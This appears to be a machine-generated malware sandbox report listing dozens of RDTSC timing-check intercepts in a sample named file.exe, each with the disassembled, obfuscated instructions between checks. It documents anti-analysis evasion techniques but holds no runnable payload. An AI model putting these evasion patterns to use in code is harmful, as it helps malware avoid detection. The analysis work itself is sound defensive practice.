Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D079F second address: 49D07C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D07C1 second address: 49D07C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D07E0 second address: 49D07E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D07E5 second address: 49D06BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007F99FCCDC7E6h 0x0000000f retn 0008h 0x00000012 push 00401BF4h 0x00000017 push edi 0x00000018 mov dword ptr [0045F81Ch], eax 0x0000001d call esi 0x0000001f mov edi, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F99FCCDC7DDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0AD6 second address: 49B0ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0ADA second address: 49B0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0AE0 second address: 49B0B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov dl, cl 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F99FD381EF3h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edi, cx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01726 second address: 4A0172A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0172A second address: 4A0172E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0172E second address: 4A01734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01734 second address: 4A01791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F99FD381EEBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F99FD381EF6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F99FD381EF0h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F99FD381EF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01791 second address: 49A0B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DFh 0x00000008 pushfd 0x00000009 jmp 00007F99FCCDC7E8h 0x0000000e add cx, 9F88h 0x00000013 jmp 00007F99FCCDC7DBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jmp dword ptr [7598155Ch] 0x00000022 mov edi, edi 0x00000024 push ebp 0x00000025 mov ebp, esp 0x00000027 mov ecx, dword ptr fs:[00000018h] 0x0000002e mov eax, dword ptr [ebp+08h] 0x00000031 mov dword ptr [ecx+34h], 00000000h 0x00000038 cmp eax, 40h 0x0000003b jnc 00007F99FCCDC7DDh 0x0000003d mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000044 pop ebp 0x00000045 retn 0004h 0x00000048 test eax, eax 0x0000004a je 00007F99FCCDC7F3h 0x0000004c mov eax, dword ptr [00459710h] 0x00000051 cmp eax, FFFFFFFFh 0x00000054 je 00007F99FCCDC7E9h 0x00000056 mov esi, 00401BB4h 0x0000005b push esi 0x0000005c call 00007F9A01274145h 0x00000061 mov edi, edi 0x00000063 pushad 0x00000064 mov di, AC24h 0x00000068 mov ecx, edx 0x0000006a popad 0x0000006b push esp 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jmp 00007F99FCCDC7E1h 0x00000074 call 00007F99FCCDC7E0h 0x00000079 pop esi 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990649 second address: 4990696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FD381EEEh 0x0000000f push eax 0x00000010 jmp 00007F99FD381EEBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99FD381EF0h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990696 second address: 499069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 499069A second address: 49906A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49906A0 second address: 49906E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DCh 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F99FCCDC7DCh 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 pushad 0x00000019 mov eax, 186435F3h 0x0000001e mov dl, al 0x00000020 popad 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 sub eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov al, 97h 0x0000002c jmp 00007F99FCCDC7DBh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49906E6 second address: 49906FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49906FE second address: 4990718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 push ebx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990718 second address: 499072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0002C second address: 4A0005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 90h 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 7DDDA310h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0005C second address: 4A00062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00062 second address: 4A00066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00066 second address: 4A000B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F99FD381EF3h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F99FD381EEBh 0x0000001e add ecx, 5C72D61Eh 0x00000024 jmp 00007F99FD381EF9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000B9 second address: 4A000BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000BF second address: 4A000C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000C3 second address: 4A000C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000C7 second address: 4A000E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c mov ah, 94h 0x0000000e mov edx, 066C8630h 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EEBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000E9 second address: 4A00183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7DCh 0x00000013 and ecx, 162FD0D8h 0x00000019 jmp 00007F99FCCDC7DBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F99FCCDC7E8h 0x00000025 or cl, 00000038h 0x00000028 jmp 00007F99FCCDC7DBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebx, dword ptr [eax+10h] 0x00000032 jmp 00007F99FCCDC7E6h 0x00000037 xchg eax, esi 0x00000038 jmp 00007F99FCCDC7E0h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00183 second address: 4A00187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00187 second address: 4A0018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0018D second address: 4A001DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FD381EF5h 0x00000009 jmp 00007F99FD381EEBh 0x0000000e popfd 0x0000000f mov bx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F99FD381EF0h 0x0000001d and cl, FFFFFF88h 0x00000020 jmp 00007F99FD381EEBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001DE second address: 4A001E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001E2 second address: 4A0021E instructions: 0x00000000 rdtsc 0x00000002 call 00007F99FD381EF4h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, dword ptr [759B06ECh] 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EF6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0021E second address: 4A00262 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7E9h 0x00000013 and eax, 5E75EB66h 0x00000019 jmp 00007F99FCCDC7E1h 0x0000001e popfd 0x0000001f mov cx, 5F97h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00262 second address: 4A00268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00268 second address: 4A0026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0026C second address: 4A002CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F99FD382DCAh 0x0000000e jmp 00007F99FD381EEBh 0x00000013 xchg eax, edi 0x00000014 jmp 00007F99FD381EF6h 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99FD381EEDh 0x00000021 and cx, ACD6h 0x00000026 jmp 00007F99FD381EF1h 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002CB second address: 4A002DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002DE second address: 4A002F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002F6 second address: 4A00334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 jmp 00007F99FCCDC7E6h 0x0000001c push 00000044h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F99FCCDC7DCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00334 second address: 4A00355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F99FD381EF0h 0x0000000b push ecx 0x0000000c pop edi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00355 second address: 4A00359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00359 second address: 4A0035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00474 second address: 4A004A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9A6DC0B9F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99FCCDC7E0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004A5 second address: 4A004B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004B4 second address: 4A004F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FCCDC7DFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F99FCCDC7E9h 0x00000011 popfd 0x00000012 mov ch, 53h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004F4 second address: 4A004F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004F8 second address: 4A004FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004FE second address: 4A00518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 124FB3F3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00518 second address: 4A00557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 009D41D1h 0x0000000e popad 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99FCCDC7E6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00557 second address: 4A0055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0055D second address: 4A00614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007F99FCCDC7DBh 0x00000013 mov dword ptr [esi+0Ch], eax 0x00000016 jmp 00007F99FCCDC7E6h 0x0000001b mov eax, dword ptr [ebx+4Ch] 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 mov dword ptr [esi+10h], eax 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a mov ah, CEh 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+50h] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov bh, 7Fh 0x00000034 mov si, B419h 0x00000038 popad 0x00000039 pushfd 0x0000003a jmp 00007F99FCCDC7E6h 0x0000003f xor al, FFFFFFA8h 0x00000042 jmp 00007F99FCCDC7DBh 0x00000047 popfd 0x00000048 popad 0x00000049 mov dword ptr [esi+14h], eax 0x0000004c jmp 00007F99FCCDC7E6h 0x00000051 mov eax, dword ptr [ebx+54h] 0x00000054 jmp 00007F99FCCDC7E0h 0x00000059 mov dword ptr [esi+18h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00614 second address: 4A0061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0061A second address: 4A00620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00620 second address: 4A00624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00624 second address: 4A00667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e jmp 00007F99FCCDC7E0h 0x00000013 mov dword ptr [esi+1Ch], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99FCCDC7E7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00667 second address: 4A0066D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0066D second address: 4A0067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0067E second address: 4A00696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00696 second address: 4A006E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dx, 0DA0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F99FCCDC7E5h 0x00000017 xor si, 54A6h 0x0000001c jmp 00007F99FCCDC7E1h 0x00000021 popfd 0x00000022 call 00007F99FCCDC7E0h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A006E6 second address: 4A007BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+60h] 0x00000009 jmp 00007F99FD381EF7h 0x0000000e mov dword ptr [esi+24h], eax 0x00000011 jmp 00007F99FD381EF6h 0x00000016 mov eax, dword ptr [ebx+64h] 0x00000019 pushad 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F99FD381EF8h 0x00000021 sub eax, 6EC7FA38h 0x00000027 jmp 00007F99FD381EEBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov dword ptr [esi+28h], eax 0x00000032 jmp 00007F99FD381EEFh 0x00000037 mov eax, dword ptr [ebx+68h] 0x0000003a jmp 00007F99FD381EF6h 0x0000003f mov dword ptr [esi+2Ch], eax 0x00000042 pushad 0x00000043 movzx ecx, di 0x00000046 pushad 0x00000047 mov eax, edi 0x00000049 mov ah, bh 0x0000004b popad 0x0000004c popad 0x0000004d mov ax, word ptr [ebx+6Ch] 0x00000051 jmp 00007F99FD381EECh 0x00000056 mov word ptr [esi+30h], ax 0x0000005a jmp 00007F99FD381EF0h 0x0000005f mov ax, word ptr [ebx+00000088h] 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007BB second address: 4A007BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007BF second address: 4A007C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007C3 second address: 4A007C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007C9 second address: 4A007F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 62B72221h 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+32h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99FD381EF2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007F1 second address: 4A007F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007F5 second address: 4A007FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007FB second address: 4A00869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DCh 0x00000008 pushfd 0x00000009 jmp 00007F99FCCDC7E2h 0x0000000e sbb si, DD48h 0x00000013 jmp 00007F99FCCDC7DBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 jmp 00007F99FCCDC7E6h 0x00000027 mov dword ptr [esi+34h], eax 0x0000002a jmp 00007F99FCCDC7E0h 0x0000002f mov eax, dword ptr [ebx+18h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00869 second address: 4A00886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00886 second address: 4A00896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00896 second address: 4A008CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F99FD381EEDh 0x00000012 adc si, 23D6h 0x00000017 jmp 00007F99FD381EF1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f movzx eax, dx 0x00000022 rdtsc
